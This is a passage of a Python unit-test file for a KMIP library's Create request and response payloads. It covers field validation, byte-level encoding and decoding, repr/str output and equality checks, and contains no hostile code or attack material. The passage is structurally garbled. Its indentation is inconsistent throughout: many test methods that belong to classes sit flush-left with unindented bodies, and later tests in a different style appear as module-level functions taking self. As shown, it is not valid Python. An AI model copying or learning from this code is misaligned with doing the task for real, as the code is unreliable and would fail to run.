"field.",
payload.write,
*args
)
def test_write_missing_attributes(self):
"""
Test that an InvalidField error is raised during the encoding of a
Create request payload when the payload is missing the template
attribute.
"""
payload = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY
)
stream = utils.BytearrayStream()
args = (stream, )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_2_0}
self.assertRaisesRegex(
exceptions.InvalidField,
"The Create request payload is missing the template attribute "
"field.",
payload.write,
*args,
**kwargs
)
    def test_repr(self):
        """
        Test that repr can be applied to a Create request payload structure.
        """
        payload = payloads.CreateRequestPayload(
            object_type=enums.ObjectType.SYMMETRIC_KEY,
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Algorithm'
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.CryptographicAlgorithm,
                            value=enums.CryptographicAlgorithm.AES,
                            tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
                        )
                    ),
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Length'
                        ),
                        attribute_value=primitives.Integer(
                            value=128,
                            tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
                        )
                    )
                ]
            ),
            protection_storage_masks=objects.ProtectionStorageMasks(
                protection_storage_masks=[
                    (
                        enums.ProtectionStorageMask.SOFTWARE.value |
                        enums.ProtectionStorageMask.HARDWARE.value
                    )
                ]
            )
        )
        # The template attribute renders via the generic "Struct()" form;
        # the mask value 3 is SOFTWARE (1) | HARDWARE (2).
        self.assertEqual(
            "CreateRequestPayload("
            "object_type=ObjectType.SYMMETRIC_KEY, "
            "template_attribute=Struct(), "
            "protection_storage_masks=ProtectionStorageMasks("
            "protection_storage_masks=[3]))",
            repr(payload)
        )
    def test_str(self):
        """
        Test that str can be applied to a Create request payload structure.
        """
        payload = payloads.CreateRequestPayload(
            object_type=enums.ObjectType.SYMMETRIC_KEY,
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Algorithm'
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.CryptographicAlgorithm,
                            value=enums.CryptographicAlgorithm.AES,
                            tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
                        )
                    ),
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Length'
                        ),
                        attribute_value=primitives.Integer(
                            value=128,
                            tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
                        )
                    )
                ]
            ),
            protection_storage_masks=objects.ProtectionStorageMasks(
                protection_storage_masks=[
                    (
                        enums.ProtectionStorageMask.SOFTWARE.value |
                        enums.ProtectionStorageMask.HARDWARE.value
                    )
                ]
            )
        )
        # str() produces a JSON-like rendering; the template attribute
        # falls back to the generic "Struct()" form.
        self.assertEqual(
            '{'
            '"object_type": ObjectType.SYMMETRIC_KEY, '
            '"template_attribute": Struct(), '
            '"protection_storage_masks": {"protection_storage_masks": [3]}'
            '}',
            str(payload)
        )
def test_equal_on_equal(self):
"""
Test that the equality operator returns True when comparing two Create
request payloads with the same data.
"""
a = payloads.CreateRequestPayload()
b = payloads.CreateRequestPayload()
self.assertTrue(a == b)
self.assertTrue(b == a)
a = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
b = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
self.assertTrue(a == b)
self.assertTrue(b == a)
def test_equal_on_not_equal_object_type(self):
"""
Test that the equality operator returns False when comparing two Create
request payloads with different object types.
"""
a = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY
)
b = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SECRET_DATA
)
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_equal_on_not_equal_template_attribute(self):
"""
Test that the equality operator returns False when comparing two Create
request payloads with different template attributes.
"""
a = payloads.CreateRequestPayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
]
)
)
b = payloads.CreateRequestPayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
)
]
)
)
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_equal_on_not_equal_protection_storage_masks(self):
"""
Test that the equality operator returns False when comparing two Create
request payloads with different protection storage masks.
"""
a = payloads.CreateRequestPayload(
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
b = payloads.CreateRequestPayload(
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.ON_SYSTEM.value |
enums.ProtectionStorageMask.OFF_SYSTEM.value
)
]
)
)
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_equal_on_type_mismatch(self):
"""
Test that the equality operator returns False when comparing two Create
request payloads with different types.
"""
a = payloads.CreateRequestPayload()
b = 'invalid'
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_not_equal_on_equal(self):
"""
Test that the inequality operator returns False when comparing two
Create request payloads with the same data.
"""
a = payloads.CreateRequestPayload()
b = payloads.CreateRequestPayload()
self.assertFalse(a != b)
self.assertFalse(b != a)
a = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
b = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
self.assertFalse(a != b)
self.assertFalse(b != a)
def test_not_equal_on_not_equal_object_type(self):
"""
Test that the inequality operator returns True when comparing two
Create request payloads with different object types.
"""
a = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY
)
b = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SECRET_DATA
)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_not_equal_on_not_equal_template_attribute(self):
"""
Test that the inequality operator returns True when comparing two
Create request payloads with different template attributes.
"""
a = payloads.CreateRequestPayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
]
)
)
b = payloads.CreateRequestPayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
)
]
)
)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_not_equal_on_not_equal_protection_storage_masks(self):
"""
Test that the inequality operator returns True when comparing two
Create request payloads with different protection storage masks.
"""
a = payloads.CreateRequestPayload(
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
b = payloads.CreateRequestPayload(
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.ON_SYSTEM.value |
enums.ProtectionStorageMask.OFF_SYSTEM.value
)
]
)
)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_not_equal_on_type_mismatch(self):
"""
Test that the inequality operator returns True when comparing two
Create request payloads with different types.
"""
a = payloads.CreateRequestPayload()
b = 'invalid'
self.assertTrue(a != b)
self.assertTrue(b != a)
class TestCreateResponsePayload(testtools.TestCase):
    def setUp(self):
        """
        Set up the static KMIP encodings shared by the Create response
        payload tests.
        """
        super(TestCreateResponsePayload, self).setUp()
        # Encoding obtained in part from the KMIP 1.1 testing document,
        # Section 3.1.1. The TemplateAttribute was added manually from the
        # Create request payload encoding.
        #
        # This encoding matches the following set of values:
        # Response Payload
        #     Object Type - Symmetric Key
        #     Unique Identifier - fb4b5b9c-6188-4c63-8142-fe9c328129fc
        #     Template Attribute
        #         Attribute
        #             Attribute Name - State
        #             Attribute Value - PRE_ACTIVE
        self.full_encoding = utils.BytearrayStream(
            b'\x42\x00\x7C\x01\x00\x00\x00\x70'
            b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
            b'\x42\x00\x94\x07\x00\x00\x00\x24'
            b'\x66\x62\x34\x62\x35\x62\x39\x63\x2D\x36\x31\x38\x38\x2D\x34\x63'
            b'\x36\x33\x2D\x38\x31\x34\x32\x2D\x66\x65\x39\x63\x33\x32\x38\x31'
            b'\x32\x39\x66\x63\x00\x00\x00\x00'
            b'\x42\x00\x91\x01\x00\x00\x00\x28'
            b'\x42\x00\x08\x01\x00\x00\x00\x20'
            b'\x42\x00\x0A\x07\x00\x00\x00\x05'
            b'\x53\x74\x61\x74\x65\x00\x00\x00'
            b'\x42\x00\x0B\x05\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
        )
        # Encoding obtained in part from the KMIP 1.1 testing document,
        # Section 3.1.1. The TemplateAttribute was added manually from the
        # Create request payload encoding.
        #
        # This encoding matches the following set of values:
        # Response Payload
        #     Unique Identifier - fb4b5b9c-6188-4c63-8142-fe9c328129fc
        #     Template Attribute
        #         Attribute
        #             Attribute Name - State
        #             Attribute Value - PRE_ACTIVE
        self.no_object_type_encoding = utils.BytearrayStream(
            b'\x42\x00\x7C\x01\x00\x00\x00\x60'
            b'\x42\x00\x94\x07\x00\x00\x00\x24'
            b'\x66\x62\x34\x62\x35\x62\x39\x63\x2D\x36\x31\x38\x38\x2D\x34\x63'
            b'\x36\x33\x2D\x38\x31\x34\x32\x2D\x66\x65\x39\x63\x33\x32\x38\x31'
            b'\x32\x39\x66\x63\x00\x00\x00\x00'
            b'\x42\x00\x91\x01\x00\x00\x00\x28'
            b'\x42\x00\x08\x01\x00\x00\x00\x20'
            b'\x42\x00\x0A\x07\x00\x00\x00\x05'
            b'\x53\x74\x61\x74\x65\x00\x00\x00'
            b'\x42\x00\x0B\x05\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
        )
        # Encoding obtained in part from the KMIP 1.1 testing document,
        # Section 3.1.1. The TemplateAttribute was added manually from the
        # Create request payload encoding.
        #
        # This encoding matches the following set of values:
        # Response Payload
        #     Object Type - Symmetric Key
        #     Template Attribute
        #         Attribute
        #             Attribute Name - State
        #             Attribute Value - PRE_ACTIVE
        self.no_unique_identifier_encoding = utils.BytearrayStream(
            b'\x42\x00\x7C\x01\x00\x00\x00\x50'
            b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
            b'\x42\x00\x91\x01\x00\x00\x00\x28'
            b'\x42\x00\x08\x01\x00\x00\x00\x20'
            b'\x42\x00\x0A\x07\x00\x00\x00\x05'
            b'\x53\x74\x61\x74\x65\x00\x00\x00'
            b'\x42\x00\x0B\x05\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
        )
        # Encoding obtained in part from the KMIP 1.1 testing document,
        # Section 3.1.1.
        #
        # This encoding matches the following set of values:
        # Response Payload
        #     Object Type - Symmetric Key
        #     Unique Identifier - fb4b5b9c-6188-4c63-8142-fe9c328129fc
        self.no_template_attribute_encoding = utils.BytearrayStream(
            b'\x42\x00\x7C\x01\x00\x00\x00\x40'
            b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
            b'\x42\x00\x94\x07\x00\x00\x00\x24'
            b'\x66\x62\x34\x62\x35\x62\x39\x63\x2D\x36\x31\x38\x38\x2D\x34\x63'
            b'\x36\x33\x2D\x38\x31\x34\x32\x2D\x66\x65\x39\x63\x33\x32\x38\x31'
            b'\x32\x39\x66\x63\x00\x00\x00\x00'
        )
    def tearDown(self):
        # No per-test state to clean up beyond what the base class handles.
        super(TestCreateResponsePayload, self).tearDown()
def test_invalid_object_type(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the object type of a Create response payload.
"""
kwargs = {'object_type': 'invalid'}
self.assertRaisesRegex(
TypeError,
"Object type must be an ObjectType enumeration.",
payloads.CreateResponsePayload,
**kwargs
)
args = (
payloads.CreateResponsePayload(),
'object_type',
'invalid'
)
self.assertRaisesRegex(
TypeError,
"Object type must be an ObjectType enumeration.",
setattr,
*args
)
def test_invalid_unique_identifier(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the unique identifier of a Create response payload.
"""
kwargs = {'unique_identifier': 0}
self.assertRaisesRegex(
TypeError,
"Unique identifier must be a string.",
payloads.CreateResponsePayload,
**kwargs
)
args = (payloads.CreateResponsePayload(), 'unique_identifier', 0)
self.assertRaisesRegex(
TypeError,
"Unique identifier must be a string.",
setattr,
*args
)
def test_invalid_template_attribute(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the template attribute of a Create response payload.
"""
kwargs = {'template_attribute': 'invalid'}
self.assertRaisesRegex(
TypeError,
"Template attribute must be a TemplateAttribute structure.",
payloads.CreateResponsePayload,
**kwargs
)
args = (
payloads.CreateResponsePayload(),
'template_attribute',
'invalid'
)
self.assertRaisesRegex(
TypeError,
"Template attribute must be a TemplateAttribute structure.",
setattr,
*args
)
def test_read(self):
"""
Test that a Create response payload can be read from a data stream.
"""
payload = payloads.CreateResponsePayload()
self.assertEqual(None, payload.object_type)
self.assertEqual(None, payload.unique_identifier)
self.assertEqual(None, payload.template_attribute)
payload.read(self.full_encoding)
self.assertEqual(
enums.ObjectType.SYMMETRIC_KEY,
payload.object_type
)
self.assertEqual(
'fb4b5b9c-6188-4c63-8142-fe9c328129fc',
payload.unique_identifier
)
self.assertEqual(
objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'State'
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
),
payload.template_attribute
)
def test_read_kmip_2_0(self):
"""
Test that a Create response payload can be read from a data stream
encoded with the KMIP 2.0 format.
"""
payload = payloads.CreateResponsePayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.unique_identifier)
self.assertIsNone(payload.template_attribute)
payload.read(
self.no_template_attribute_encoding,
kmip_version=enums.KMIPVersion.KMIP_2_0
)
self.assertEqual(
enums.ObjectType.SYMMETRIC_KEY,
payload.object_type
)
self.assertEqual(
'fb4b5b9c-6188-4c63-8142-fe9c328129fc',
payload.unique_identifier
)
self.assertIsNone(payload.template_attribute)
def test_read_missing_object_type(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding
of a Create response payload when the object type is missing from the
encoding.
"""
payload = payloads.CreateResponsePayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.unique_identifier)
self.assertIsNone(payload.template_attribute)
args = (self.no_object_type_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The Create response payload encoding is missing the object type.",
payload.read,
*args
)
def test_read_missing_unique_identifier(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding
of a Create response payload when the unique identifier is missing
from the encoding.
"""
payload = payloads.CreateResponsePayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.unique_identifier)
self.assertIsNone(payload.template_attribute)
args = (self.no_unique_identifier_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The Create response payload encoding is missing the unique "
"identifier.",
payload.read,
*args
)
def test_read_missing_template_attribute(self):
"""
Test that a Create response payload can be read from a data stream
event when missing the template attribute.
"""
payload = payloads.CreateResponsePayload()
self.assertEqual(None, payload.object_type)
self.assertEqual(None, payload.unique_identifier)
self.assertEqual(None, payload.template_attribute)
payload.read(self.no_template_attribute_encoding)
self.assertEqual(
enums.ObjectType.SYMMETRIC_KEY,
payload.object_type
)
self.assertEqual(
'fb4b5b9c-6188-4c63-8142-fe9c328129fc',
payload.unique_identifier
)
self.assertIsNone(payload.template_attribute)
    def test_write(self):
        """
        Test that a Create response payload can be written to a data stream.
        """
        payload = payloads.CreateResponsePayload(
            object_type=enums.ObjectType.SYMMETRIC_KEY,
            unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            "State"
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.State,
                            value=enums.State.PRE_ACTIVE,
                            tag=enums.Tags.STATE
                        )
                    )
                ]
            )
        )
        stream = utils.BytearrayStream()
        payload.write(stream)
        # The serialized stream should match the static test encoding byte
        # for byte.
        self.assertEqual(len(self.full_encoding), len(stream))
        self.assertEqual(str(self.full_encoding), str(stream))
    def test_write_kmip_2_0(self):
        """
        Test that a Create response payload can be written to a data stream
        encoded with the KMIP 2.0 format.
        """
        payload = payloads.CreateResponsePayload(
            object_type=enums.ObjectType.SYMMETRIC_KEY,
            unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            "State"
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.State,
                            value=enums.State.PRE_ACTIVE,
                            tag=enums.Tags.STATE
                        )
                    )
                ]
            )
        )
        stream = utils.BytearrayStream()
        payload.write(stream, kmip_version=enums.KMIPVersion.KMIP_2_0)
        # In KMIP 2.0 the template attribute is not serialized, so the
        # output matches the encoding without a template attribute.
        self.assertEqual(len(self.no_template_attribute_encoding), len(stream))
        self.assertEqual(str(self.no_template_attribute_encoding), str(stream))
def test_write_missing_object_type(self):
"""
Test that an InvalidField error is raised during the encoding of a
Create response payload when the payload is missing the object type.
"""
payload = payloads.CreateResponsePayload(
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
stream = utils.BytearrayStream()
args = (stream, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The Create response payload is missing the object type field.",
payload.write,
*args
)
def test_write_missing_unique_identifier(self):
"""
Test that an InvalidField error is raised during the encoding of a
Create response payload when the payload is missing the unique
identifier.
"""
payload = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
stream = utils.BytearrayStream()
args = (stream, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The Create response payload is missing the unique identifier "
"field.",
payload.write,
*args
)
def test_write_missing_template_attribute(self):
"""
Test that a Create response payload can be written to a data stream
even when missing the template attribute.
"""
payload = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc"
)
stream = utils.BytearrayStream()
payload.write(stream)
self.assertEqual(len(self.no_template_attribute_encoding), len(stream))
self.assertEqual(str(self.no_template_attribute_encoding), str(stream))
    def test_repr(self):
        """
        Test that repr can be applied to a Create response payload structure.
        """
        payload = payloads.CreateResponsePayload(
            object_type=enums.ObjectType.SYMMETRIC_KEY,
            unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            "State"
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.State,
                            value=enums.State.PRE_ACTIVE,
                            tag=enums.Tags.STATE
                        )
                    )
                ]
            )
        )
        # The template attribute renders via the generic "Struct()" form.
        self.assertEqual(
            "CreateResponsePayload("
            "object_type=ObjectType.SYMMETRIC_KEY, "
            "unique_identifier='fb4b5b9c-6188-4c63-8142-fe9c328129fc', "
            "template_attribute=Struct())",
            repr(payload)
        )
    def test_str(self):
        """
        Test that str can be applied to a Create response payload structure.
        """
        payload = payloads.CreateResponsePayload(
            object_type=enums.ObjectType.SYMMETRIC_KEY,
            unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            "State"
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.State,
                            value=enums.State.PRE_ACTIVE,
                            tag=enums.Tags.STATE
                        )
                    )
                ]
            )
        )
        # str() produces a JSON-like rendering; the template attribute
        # falls back to the generic "Struct()" form.
        self.assertEqual(
            '{'
            '"object_type": ObjectType.SYMMETRIC_KEY, '
            '"unique_identifier": "fb4b5b9c-6188-4c63-8142-fe9c328129fc", '
            '"template_attribute": Struct()'
            '}',
            str(payload)
        )
def test_equal_on_equal(self):
    """
    Test that the equality operator returns True when comparing two Create
    response payloads with the same data.
    """
    # Two empty payloads compare equal, symmetrically.
    a = payloads.CreateResponsePayload()
    b = payloads.CreateResponsePayload()
    self.assertTrue(a == b)
    self.assertTrue(b == a)

    # Two identically populated payloads also compare equal.
    def build():
        return payloads.CreateResponsePayload(
            object_type=enums.ObjectType.SYMMETRIC_KEY,
            unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            "State"
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.State,
                            value=enums.State.PRE_ACTIVE,
                            tag=enums.Tags.STATE
                        )
                    )
                ]
            )
        )

    a = build()
    b = build()
    self.assertTrue(a == b)
    self.assertTrue(b == a)
def test_equal_on_not_equal_object_type(self):
    """
    Test that the equality operator returns False when comparing two Create
    response payloads with different object types.
    """
    a = payloads.CreateResponsePayload(
        object_type=enums.ObjectType.SYMMETRIC_KEY
    )
    b = payloads.CreateResponsePayload(
        object_type=enums.ObjectType.SECRET_DATA
    )
    # Equality must fail symmetrically.
    for left, right in ((a, b), (b, a)):
        self.assertFalse(left == right)
def test_equal_on_not_equal_unique_identifier(self):
    """
    Test that the equality operator returns False when comparing two Create
    response payloads with different unique identifiers.
    """
    a = payloads.CreateResponsePayload(unique_identifier="a")
    b = payloads.CreateResponsePayload(unique_identifier="b")
    # Equality must fail symmetrically.
    for left, right in ((a, b), (b, a)):
        self.assertFalse(left == right)
def test_equal_on_not_equal_template_attribute(self):
    """
    Test that the equality operator returns False when comparing two Create
    response payloads with different template attributes.
    """
    # The two payloads differ only in the State attribute's value.
    def build(state_value):
        return payloads.CreateResponsePayload(
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            "State"
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.State,
                            value=state_value,
                            tag=enums.Tags.STATE
                        )
                    )
                ]
            )
        )

    a = build(enums.State.PRE_ACTIVE)
    b = build(enums.State.ACTIVE)
    for left, right in ((a, b), (b, a)):
        self.assertFalse(left == right)
def test_equal_on_type_mismatch(self):
    """
    Test that the equality operator returns False when comparing two Create
    response payloads with different types.
    """
    a = payloads.CreateResponsePayload()
    b = "invalid"
    # Comparison against a foreign type is False in both directions.
    for left, right in ((a, b), (b, a)):
        self.assertFalse(left == right)
def test_not_equal_on_equal(self):
    """
    Test that the inequality operator returns False when comparing two
    Create response payloads with the same data.
    """
    # Two empty payloads are not unequal.
    a = payloads.CreateResponsePayload()
    b = payloads.CreateResponsePayload()
    self.assertFalse(a != b)
    self.assertFalse(b != a)

    # Two identically populated payloads are not unequal either.
    def build():
        return payloads.CreateResponsePayload(
            object_type=enums.ObjectType.SYMMETRIC_KEY,
            unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            "State"
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.State,
                            value=enums.State.PRE_ACTIVE,
                            tag=enums.Tags.STATE
                        )
                    )
                ]
            )
        )

    a = build()
    b = build()
    self.assertFalse(a != b)
    self.assertFalse(b != a)
def test_not_equal_on_not_equal_object_type(self):
    """
    Test that the inequality operator returns True when comparing two
    Create response payloads with different object types.
    """
    a = payloads.CreateResponsePayload(
        object_type=enums.ObjectType.SYMMETRIC_KEY
    )
    b = payloads.CreateResponsePayload(
        object_type=enums.ObjectType.SECRET_DATA
    )
    # Inequality must hold symmetrically.
    for left, right in ((a, b), (b, a)):
        self.assertTrue(left != right)
def test_not_equal_on_not_equal_unique_identifier(self):
    """
    Test that the inequality operator returns True when comparing two
    Create response payloads with different unique identifiers.
    """
    a = payloads.CreateResponsePayload(unique_identifier="a")
    b = payloads.CreateResponsePayload(unique_identifier="b")
    # Inequality must hold symmetrically.
    for left, right in ((a, b), (b, a)):
        self.assertTrue(left != right)
def test_not_equal_on_not_equal_template_attribute(self):
    """
    Test that the inequality operator returns True when comparing two
    Create response payloads with different template attributes.
    """
    # The two payloads differ only in the State attribute's value.
    def build(state_value):
        return payloads.CreateResponsePayload(
            template_attribute=objects.TemplateAttribute(
